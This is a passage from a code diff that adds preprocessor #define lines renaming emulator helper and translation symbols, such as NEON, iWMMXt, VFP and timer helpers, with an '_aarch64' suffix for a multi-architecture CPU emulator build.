gen_vfp_cmpe_aarch64 +#define gen_vfp_div gen_vfp_div_aarch64 +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_aarch64 +#define gen_vfp_F1_mul gen_vfp_F1_mul_aarch64 +#define gen_vfp_F1_neg gen_vfp_F1_neg_aarch64 +#define gen_vfp_ld gen_vfp_ld_aarch64 +#define gen_vfp_mrs gen_vfp_mrs_aarch64 +#define gen_vfp_msr gen_vfp_msr_aarch64 +#define gen_vfp_mul gen_vfp_mul_aarch64 +#define gen_vfp_neg gen_vfp_neg_aarch64 +#define gen_vfp_shto gen_vfp_shto_aarch64 +#define gen_vfp_sito gen_vfp_sito_aarch64 +#define gen_vfp_slto gen_vfp_slto_aarch64 +#define gen_vfp_sqrt gen_vfp_sqrt_aarch64 +#define gen_vfp_st gen_vfp_st_aarch64 +#define gen_vfp_sub gen_vfp_sub_aarch64 +#define gen_vfp_tosh gen_vfp_tosh_aarch64 +#define gen_vfp_tosi gen_vfp_tosi_aarch64 +#define gen_vfp_tosiz gen_vfp_tosiz_aarch64 +#define gen_vfp_tosl gen_vfp_tosl_aarch64 +#define gen_vfp_touh gen_vfp_touh_aarch64 +#define gen_vfp_toui gen_vfp_toui_aarch64 +#define gen_vfp_touiz 
gen_vfp_touiz_aarch64 +#define gen_vfp_toul gen_vfp_toul_aarch64 +#define gen_vfp_uhto gen_vfp_uhto_aarch64 +#define gen_vfp_uito gen_vfp_uito_aarch64 +#define gen_vfp_ulto gen_vfp_ulto_aarch64 +#define get_arm_cp_reginfo get_arm_cp_reginfo_aarch64 +#define get_clock get_clock_aarch64 +#define get_clock_realtime get_clock_realtime_aarch64 +#define get_constraint_priority get_constraint_priority_aarch64 +#define get_float_exception_flags get_float_exception_flags_aarch64 +#define get_float_rounding_mode get_float_rounding_mode_aarch64 +#define get_fpstatus_ptr get_fpstatus_ptr_aarch64 +#define get_level1_table_address get_level1_table_address_aarch64 +#define get_mem_index get_mem_index_aarch64 +#define get_next_param_value get_next_param_value_aarch64 +#define get_opt_name get_opt_name_aarch64 +#define get_opt_value get_opt_value_aarch64 +#define get_page_addr_code get_page_addr_code_aarch64 +#define get_param_value get_param_value_aarch64 +#define get_phys_addr get_phys_addr_aarch64 +#define get_phys_addr_lpae get_phys_addr_lpae_aarch64 +#define get_phys_addr_mpu get_phys_addr_mpu_aarch64 +#define get_phys_addr_v5 get_phys_addr_v5_aarch64 +#define get_phys_addr_v6 get_phys_addr_v6_aarch64 +#define get_system_memory get_system_memory_aarch64 +#define get_ticks_per_sec get_ticks_per_sec_aarch64 +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_aarch64 +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__aarch64 +#define gt_cntfrq_access gt_cntfrq_access_aarch64 +#define gt_cnt_read gt_cnt_read_aarch64 +#define gt_cnt_reset gt_cnt_reset_aarch64 +#define gt_counter_access gt_counter_access_aarch64 +#define gt_ctl_write gt_ctl_write_aarch64 +#define gt_cval_write gt_cval_write_aarch64 +#define gt_get_countervalue gt_get_countervalue_aarch64 +#define gt_pct_access gt_pct_access_aarch64 +#define gt_ptimer_access gt_ptimer_access_aarch64 +#define gt_recalc_timer gt_recalc_timer_aarch64 +#define gt_timer_access gt_timer_access_aarch64 +#define gt_tval_read 
gt_tval_read_aarch64 +#define gt_tval_write gt_tval_write_aarch64 +#define gt_vct_access gt_vct_access_aarch64 +#define gt_vtimer_access gt_vtimer_access_aarch64 +#define guest_phys_blocks_free guest_phys_blocks_free_aarch64 +#define guest_phys_blocks_init guest_phys_blocks_init_aarch64 +#define handle_vcvt handle_vcvt_aarch64 +#define handle_vminmaxnm handle_vminmaxnm_aarch64 +#define handle_vrint handle_vrint_aarch64 +#define handle_vsel handle_vsel_aarch64 +#define has_help_option has_help_option_aarch64 +#define have_bmi1 have_bmi1_aarch64 +#define have_bmi2 have_bmi2_aarch64 +#define hcr_write hcr_write_aarch64 +#define helper_access_check_cp_reg helper_access_check_cp_reg_aarch64 +#define helper_add_saturate helper_add_saturate_aarch64 +#define helper_add_setq helper_add_setq_aarch64 +#define helper_add_usaturate helper_add_usaturate_aarch64 +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_aarch64 +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_aarch64 +#define helper_be_ldq_mmu helper_be_ldq_mmu_aarch64 +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_aarch64 +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_aarch64 +#define helper_be_ldul_mmu helper_be_ldul_mmu_aarch64 +#define helper_be_lduw_mmu helper_be_lduw_mmu_aarch64 +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_aarch64 +#define helper_be_stl_mmu helper_be_stl_mmu_aarch64 +#define helper_be_stq_mmu helper_be_stq_mmu_aarch64 +#define helper_be_stw_mmu helper_be_stw_mmu_aarch64 +#define helper_clear_pstate_ss helper_clear_pstate_ss_aarch64 +#define helper_clz_arm helper_clz_arm_aarch64 +#define helper_cpsr_read helper_cpsr_read_aarch64 +#define helper_cpsr_write helper_cpsr_write_aarch64 +#define helper_crc32_arm helper_crc32_arm_aarch64 +#define helper_crc32c helper_crc32c_aarch64 +#define helper_crypto_aese helper_crypto_aese_aarch64 +#define helper_crypto_aesmc helper_crypto_aesmc_aarch64 +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_aarch64 +#define helper_crypto_sha1h 
helper_crypto_sha1h_aarch64 +#define helper_crypto_sha1su1 helper_crypto_sha1su1_aarch64 +#define helper_crypto_sha256h helper_crypto_sha256h_aarch64 +#define helper_crypto_sha256h2 helper_crypto_sha256h2_aarch64 +#define helper_crypto_sha256su0 helper_crypto_sha256su0_aarch64 +#define helper_crypto_sha256su1 helper_crypto_sha256su1_aarch64 +#define helper_dc_zva helper_dc_zva_aarch64 +#define helper_double_saturate helper_double_saturate_aarch64 +#define helper_exception_internal helper_exception_internal_aarch64 +#define helper_exception_return helper_exception_return_aarch64 +#define helper_exception_with_syndrome helper_exception_with_syndrome_aarch64 +#define helper_get_cp_reg helper_get_cp_reg_aarch64 +#define helper_get_cp_reg64 helper_get_cp_reg64_aarch64 +#define helper_get_r13_banked helper_get_r13_banked_aarch64 +#define helper_get_user_reg helper_get_user_reg_aarch64 +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_aarch64 +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_aarch64 +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_aarch64 +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_aarch64 +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_aarch64 +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_aarch64 +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_aarch64 +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_aarch64 +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_aarch64 +#define helper_iwmmxt_addub helper_iwmmxt_addub_aarch64 +#define helper_iwmmxt_addul helper_iwmmxt_addul_aarch64 +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_aarch64 +#define helper_iwmmxt_align helper_iwmmxt_align_aarch64 +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_aarch64 +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_aarch64 +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_aarch64 +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_aarch64 +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_aarch64 +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_aarch64 +#define 
helper_iwmmxt_bcstw helper_iwmmxt_bcstw_aarch64 +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_aarch64 +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_aarch64 +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_aarch64 +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_aarch64 +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_aarch64 +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_aarch64 +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_aarch64 +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_aarch64 +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_aarch64 +#define helper_iwmmxt_insr helper_iwmmxt_insr_aarch64 +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_aarch64 +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_aarch64 +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_aarch64 +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_aarch64 +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_aarch64 +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_aarch64 +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_aarch64 +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_aarch64 +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_aarch64 +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_aarch64 +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_aarch64 +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_aarch64 +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_aarch64 +#define helper_iwmmxt_minub helper_iwmmxt_minub_aarch64 +#define helper_iwmmxt_minul helper_iwmmxt_minul_aarch64 +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_aarch64 +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_aarch64 +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_aarch64 +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_aarch64 +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_aarch64 +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_aarch64 +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_aarch64 +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_aarch64 +#define 
helper_iwmmxt_mulslw helper_iwmmxt_mulslw_aarch64 +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_aarch64 +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_aarch64 +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_aarch64 +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_aarch64 +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_aarch64 +#define helper_iwmmxt_packul helper_iwmmxt_packul_aarch64 +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_aarch64 +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_aarch64 +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_aarch64 +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_aarch64 +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_aarch64 +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_aarch64 +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_aarch64 +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_aarch64 +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_aarch64 +#define helper_iwmmxt_slll helper_iwmmxt_slll_aarch64 +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_aarch64 +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_aarch64 +#define helper_iwmmxt_sral helper_iwmmxt_sral_aarch64 +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_aarch64 +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_aarch64 +#define helper_iwmmxt_srll helper_iwmmxt_srll_aarch64 +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_aarch64 +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_aarch64 +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_aarch64 +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_aarch64 +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_aarch64 +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_aarch64 +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_aarch64 +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_aarch64 +#define helper_iwmmxt_subub helper_iwmmxt_subub_aarch64 +#define helper_iwmmxt_subul helper_iwmmxt_subul_aarch64 +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_aarch64 +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_aarch64 +#define 
helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_aarch64 +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_aarch64 +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_aarch64 +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_aarch64 +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_aarch64 +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_aarch64 +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_aarch64 +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_aarch64 +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_aarch64 +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_aarch64 +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_aarch64 +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_aarch64 +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_aarch64 +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_aarch64 +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_aarch64 +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_aarch64 +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_aarch64 +#define helper_ldb_cmmu helper_ldb_cmmu_aarch64 +#define helper_ldb_mmu helper_ldb_mmu_aarch64 +#define helper_ldl_cmmu helper_ldl_cmmu_aarch64 +#define helper_ldl_mmu helper_ldl_mmu_aarch64 +#define helper_ldq_cmmu helper_ldq_cmmu_aarch64 +#define helper_ldq_mmu helper_ldq_mmu_aarch64 +#define helper_ldw_cmmu helper_ldw_cmmu_aarch64 +#define helper_ldw_mmu helper_ldw_mmu_aarch64 +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_aarch64 +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_aarch64 +#define helper_le_ldq_mmu helper_le_ldq_mmu_aarch64 +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_aarch64 +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_aarch64 +#define helper_le_ldul_mmu helper_le_ldul_mmu_aarch64 +#define helper_le_lduw_mmu helper_le_lduw_mmu_aarch64 +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_aarch64 +#define helper_le_stl_mmu helper_le_stl_mmu_aarch64 +#define helper_le_stq_mmu 
helper_le_stq_mmu_aarch64 +#define helper_le_stw_mmu helper_le_stw_mmu_aarch64 +#define helper_msr_i_pstate helper_msr_i_pstate_aarch64 +#define helper_neon_abd_f32 helper_neon_abd_f32_aarch64 +#define helper_neon_abdl_s16 helper_neon_abdl_s16_aarch64 +#define helper_neon_abdl_s32 helper_neon_abdl_s32_aarch64 +#define helper_neon_abdl_s64 helper_neon_abdl_s64_aarch64 +#define helper_neon_abdl_u16 helper_neon_abdl_u16_aarch64 +#define helper_neon_abdl_u32 helper_neon_abdl_u32_aarch64 +#define helper_neon_abdl_u64 helper_neon_abdl_u64_aarch64 +#define helper_neon_abd_s16 helper_neon_abd_s16_aarch64 +#define helper_neon_abd_s32 helper_neon_abd_s32_aarch64 +#define helper_neon_abd_s8 helper_neon_abd_s8_aarch64 +#define helper_neon_abd_u16 helper_neon_abd_u16_aarch64 +#define helper_neon_abd_u32 helper_neon_abd_u32_aarch64 +#define helper_neon_abd_u8 helper_neon_abd_u8_aarch64 +#define helper_neon_abs_s16 helper_neon_abs_s16_aarch64 +#define helper_neon_abs_s8 helper_neon_abs_s8_aarch64 +#define helper_neon_acge_f32 helper_neon_acge_f32_aarch64 +#define helper_neon_acge_f64 helper_neon_acge_f64_aarch64 +#define helper_neon_acgt_f32 helper_neon_acgt_f32_aarch64 +#define helper_neon_acgt_f64 helper_neon_acgt_f64_aarch64 +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_aarch64 +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_aarch64 +#define helper_neon_addl_u16 helper_neon_addl_u16_aarch64 +#define helper_neon_addl_u32 helper_neon_addl_u32_aarch64 +#define helper_neon_add_u16 helper_neon_add_u16_aarch64 +#define helper_neon_add_u8 helper_neon_add_u8_aarch64 +#define helper_neon_ceq_f32 helper_neon_ceq_f32_aarch64 +#define helper_neon_ceq_u16 helper_neon_ceq_u16_aarch64 +#define helper_neon_ceq_u32 helper_neon_ceq_u32_aarch64 +#define helper_neon_ceq_u8 helper_neon_ceq_u8_aarch64 +#define helper_neon_cge_f32 helper_neon_cge_f32_aarch64 +#define helper_neon_cge_s16 helper_neon_cge_s16_aarch64 +#define helper_neon_cge_s32 
helper_neon_cge_s32_aarch64 +#define helper_neon_cge_s8 helper_neon_cge_s8_aarch64 +#define helper_neon_cge_u16 helper_neon_cge_u16_aarch64 +#define helper_neon_cge_u32 helper_neon_cge_u32_aarch64 +#define helper_neon_cge_u8 helper_neon_cge_u8_aarch64 +#define helper_neon_cgt_f32 helper_neon_cgt_f32_aarch64 +#define helper_neon_cgt_s16 helper_neon_cgt_s16_aarch64 +#define helper_neon_cgt_s32 helper_neon_cgt_s32_aarch64 +#define helper_neon_cgt_s8 helper_neon_cgt_s8_aarch64 +#define helper_neon_cgt_u16 helper_neon_cgt_u16_aarch64 +#define helper_neon_cgt_u32 helper_neon_cgt_u32_aarch64 +#define helper_neon_cgt_u8 helper_neon_cgt_u8_aarch64 +#define helper_neon_cls_s16 helper_neon_cls_s16_aarch64 +#define helper_neon_cls_s32 helper_neon_cls_s32_aarch64 +#define helper_neon_cls_s8 helper_neon_cls_s8_aarch64 +#define helper_neon_clz_u16 helper_neon_clz_u16_aarch64 +#define helper_neon_clz_u8 helper_neon_clz_u8_aarch64 +#define helper_neon_cnt_u8 helper_neon_cnt_u8_aarch64 +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_aarch64 +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_aarch64 +#define helper_neon_hadd_s16 helper_neon_hadd_s16_aarch64 +#define helper_neon_hadd_s32 helper_neon_hadd_s32_aarch64 +#define helper_neon_hadd_s8 helper_neon_hadd_s8_aarch64 +#define helper_neon_hadd_u16 helper_neon_hadd_u16_aarch64 +#define helper_neon_hadd_u32 helper_neon_hadd_u32_aarch64 +#define helper_neon_hadd_u8 helper_neon_hadd_u8_aarch64 +#define helper_neon_hsub_s16 helper_neon_hsub_s16_aarch64 +#define helper_neon_hsub_s32 helper_neon_hsub_s32_aarch64 +#define helper_neon_hsub_s8 helper_neon_hsub_s8_aarch64 +#define helper_neon_hsub_u16 helper_neon_hsub_u16_aarch64 +#define helper_neon_hsub_u32 helper_neon_hsub_u32_aarch64 +#define helper_neon_hsub_u8 helper_neon_hsub_u8_aarch64 +#define helper_neon_max_s16 helper_neon_max_s16_aarch64 +#define helper_neon_max_s32 helper_neon_max_s32_aarch64 +#define helper_neon_max_s8 helper_neon_max_s8_aarch64 
+#define helper_neon_max_u16 helper_neon_max_u16_aarch64 +#define helper_neon_max_u32 helper_neon_max_u32_aarch64 +#define helper_neon_max_u8 helper_neon_max_u8_aarch64 +#define helper_neon_min_s16 helper_neon_min_s16_aarch64 +#define helper_neon_min_s32 helper_neon_min_s32_aarch64 +#define helper_neon_min_s8 helper_neon_min_s8_aarch64 +#define helper_neon_min_u16 helper_neon_min_u16_aarch64 +#define helper_neon_min_u32 helper_neon_min_u32_aarch64 +#define helper_neon_min_u8 helper_neon_min_u8_aarch64 +#define helper_neon_mull_p8 helper_neon_mull_p8_aarch64 +#define helper_neon_mull_s16 helper_neon_mull_s16_aarch64 +#define helper_neon_mull_s8 helper_neon_mull_s8_aarch64 +#define helper_neon_mull_u16 helper_neon_mull_u16_aarch64 +#define helper_neon_mull_u8 helper_neon_mull_u8_aarch64 +#define helper_neon_mul_p8 helper_neon_mul_p8_aarch64 +#define helper_neon_mul_u16 helper_neon_mul_u16_aarch64 +#define helper_neon_mul_u8 helper_neon_mul_u8_aarch64 +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_aarch64 +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_aarch64 +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_aarch64 +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_aarch64 +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_aarch64 +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_aarch64 +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_aarch64 +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_aarch64 +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_aarch64 +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_aarch64 +#define helper_neon_narrow_u16 helper_neon_narrow_u16_aarch64 +#define helper_neon_narrow_u8 helper_neon_narrow_u8_aarch64 +#define helper_neon_negl_u16 helper_neon_negl_u16_aarch64 +#define helper_neon_negl_u32 helper_neon_negl_u32_aarch64 +#define helper_neon_paddl_u16 helper_neon_paddl_u16_aarch64 
+#define helper_neon_paddl_u32 helper_neon_paddl_u32_aarch64 +#define helper_neon_padd_u16 helper_neon_padd_u16_aarch64 +#define helper_neon_padd_u8 helper_neon_padd_u8_aarch64 +#define helper_neon_pmax_s16 helper_neon_pmax_s16_aarch64 +#define helper_neon_pmax_s8 helper_neon_pmax_s8_aarch64 +#define helper_neon_pmax_u16 helper_neon_pmax_u16_aarch64 +#define helper_neon_pmax_u8 helper_neon_pmax_u8_aarch64 +#define helper_neon_pmin_s16 helper_neon_pmin_s16_aarch64 +#define helper_neon_pmin_s8 helper_neon_pmin_s8_aarch64 +#define helper_neon_pmin_u16 helper_neon_pmin_u16_aarch64 +#define helper_neon_pmin_u8 helper_neon_pmin_u8_aarch64 +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_aarch64 +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_aarch64 +#define helper_neon_qabs_s16 helper_neon_qabs_s16_aarch64 +#define helper_neon_qabs_s32 helper_neon_qabs_s32_aarch64 +#define helper_neon_qabs_s64 helper_neon_qabs_s64_aarch64 +#define helper_neon_qabs_s8 helper_neon_qabs_s8_aarch64 +#define helper_neon_qadd_s16 helper_neon_qadd_s16_aarch64 +#define helper_neon_qadd_s32 helper_neon_qadd_s32_aarch64 +#define helper_neon_qadd_s64 helper_neon_qadd_s64_aarch64 +#define helper_neon_qadd_s8 helper_neon_qadd_s8_aarch64 +#define helper_neon_qadd_u16 helper_neon_qadd_u16_aarch64 +#define helper_neon_qadd_u32 helper_neon_qadd_u32_aarch64 +#define helper_neon_qadd_u64 helper_neon_qadd_u64_aarch64 +#define helper_neon_qadd_u8 helper_neon_qadd_u8_aarch64 +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_aarch64 +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_aarch64 +#define helper_neon_qneg_s16 helper_neon_qneg_s16_aarch64 +#define helper_neon_qneg_s32 helper_neon_qneg_s32_aarch64 +#define helper_neon_qneg_s64 helper_neon_qneg_s64_aarch64 +#define helper_neon_qneg_s8 helper_neon_qneg_s8_aarch64 +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_aarch64 +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_aarch64 +#define helper_neon_qrshl_s16 
helper_neon_qrshl_s16_aarch64 +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_aarch64 +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_aarch64 +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_aarch64 +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_aarch64 +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_aarch64 +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_aarch64 +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_aarch64 +#define helper_neon_qshl_s16 helper_neon_qshl_s16_aarch64 +#define helper_neon_qshl_s32 helper_neon_qshl_s32_aarch64 +#define helper_neon_qshl_s64 helper_neon_qshl_s64_aarch64 +#define helper_neon_qshl_s8 helper_neon_qshl_s8_aarch64 +#define helper_neon_qshl_u16 helper_neon_qshl_u16_aarch64 +#define helper_neon_qshl_u32 helper_neon_qshl_u32_aarch64 +#define helper_neon_qshl_u64 helper_neon_qshl_u64_aarch64 +#define helper_neon_qshl_u8 helper_neon_qshl_u8_aarch64 +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_aarch64 +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_aarch64 +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_aarch64 +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_aarch64 +#define helper_neon_qsub_s16 helper_neon_qsub_s16_aarch64 +#define helper_neon_qsub_s32 helper_neon_qsub_s32_aarch64 +#define helper_neon_qsub_s64 helper_neon_qsub_s64_aarch64 +#define helper_neon_qsub_s8 helper_neon_qsub_s8_aarch64 +#define helper_neon_qsub_u16 helper_neon_qsub_u16_aarch64 +#define helper_neon_qsub_u32 helper_neon_qsub_u32_aarch64 +#define helper_neon_qsub_u64 helper_neon_qsub_u64_aarch64 +#define helper_neon_qsub_u8 helper_neon_qsub_u8_aarch64 +#define helper_neon_qunzip16 helper_neon_qunzip16_aarch64 +#define helper_neon_qunzip32 helper_neon_qunzip32_aarch64 +#define helper_neon_qunzip8 helper_neon_qunzip8_aarch64 +#define helper_neon_qzip16 helper_neon_qzip16_aarch64 +#define helper_neon_qzip32 helper_neon_qzip32_aarch64 +#define helper_neon_qzip8 helper_neon_qzip8_aarch64 +#define helper_neon_rbit_u8 
helper_neon_rbit_u8_aarch64 +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_aarch64 +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_aarch64 +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_aarch64 +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_aarch64 +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_aarch64 +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_aarch64 +#define helper_neon_rshl_s16 helper_neon_rshl_s16_aarch64 +#define helper_neon_rshl_s32 helper_neon_rshl_s32_aarch64 +#define helper_neon_rshl_s64 helper_neon_rshl_s64_aarch64 +#define helper_neon_rshl_s8 helper_neon_rshl_s8_aarch64 +#define helper_neon_rshl_u16 helper_neon_rshl_u16_aarch64 +#define helper_neon_rshl_u32 helper_neon_rshl_u32_aarch64 +#define helper_neon_rshl_u64 helper_neon_rshl_u64_aarch64 +#define helper_neon_rshl_u8 helper_neon_rshl_u8_aarch64 +#define helper_neon_shl_s16 helper_neon_shl_s16_aarch64 +#define helper_neon_shl_s32 helper_neon_shl_s32_aarch64 +#define helper_neon_shl_s64 helper_neon_shl_s64_aarch64 +#define helper_neon_shl_s8 helper_neon_shl_s8_aarch64 +#define helper_neon_shl_u16 helper_neon_shl_u16_aarch64 +#define helper_neon_shl_u32 helper_neon_shl_u32_aarch64 +#define helper_neon_shl_u64 helper_neon_shl_u64_aarch64 +#define helper_neon_shl_u8 helper_neon_shl_u8_aarch64 +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_aarch64 +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_aarch64 +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_aarch64 +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_aarch64 +#define helper_neon_subl_u16 helper_neon_subl_u16_aarch64 +#define helper_neon_subl_u32 helper_neon_subl_u32_aarch64 +#define helper_neon_sub_u16 helper_neon_sub_u16_aarch64 +#define helper_neon_sub_u8 helper_neon_sub_u8_aarch64 +#define helper_neon_tbl helper_neon_tbl_aarch64 +#define helper_neon_tst_u16 helper_neon_tst_u16_aarch64 +#define helper_neon_tst_u32 helper_neon_tst_u32_aarch64 +#define helper_neon_tst_u8 helper_neon_tst_u8_aarch64 
+#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_aarch64 +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_aarch64 +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_aarch64 +#define helper_neon_unzip16 helper_neon_unzip16_aarch64 +#define helper_neon_unzip8 helper_neon_unzip8_aarch64 +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_aarch64 +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_aarch64 +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_aarch64 +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_aarch64 +#define helper_neon_widen_s16 helper_neon_widen_s16_aarch64 +#define helper_neon_widen_s8 helper_neon_widen_s8_aarch64 +#define helper_neon_widen_u16 helper_neon_widen_u16_aarch64 +#define helper_neon_widen_u8 helper_neon_widen_u8_aarch64 +#define helper_neon_zip16 helper_neon_zip16_aarch64 +#define helper_neon_zip8 helper_neon_zip8_aarch64 +#define helper_pre_hvc helper_pre_hvc_aarch64 +#define helper_pre_smc 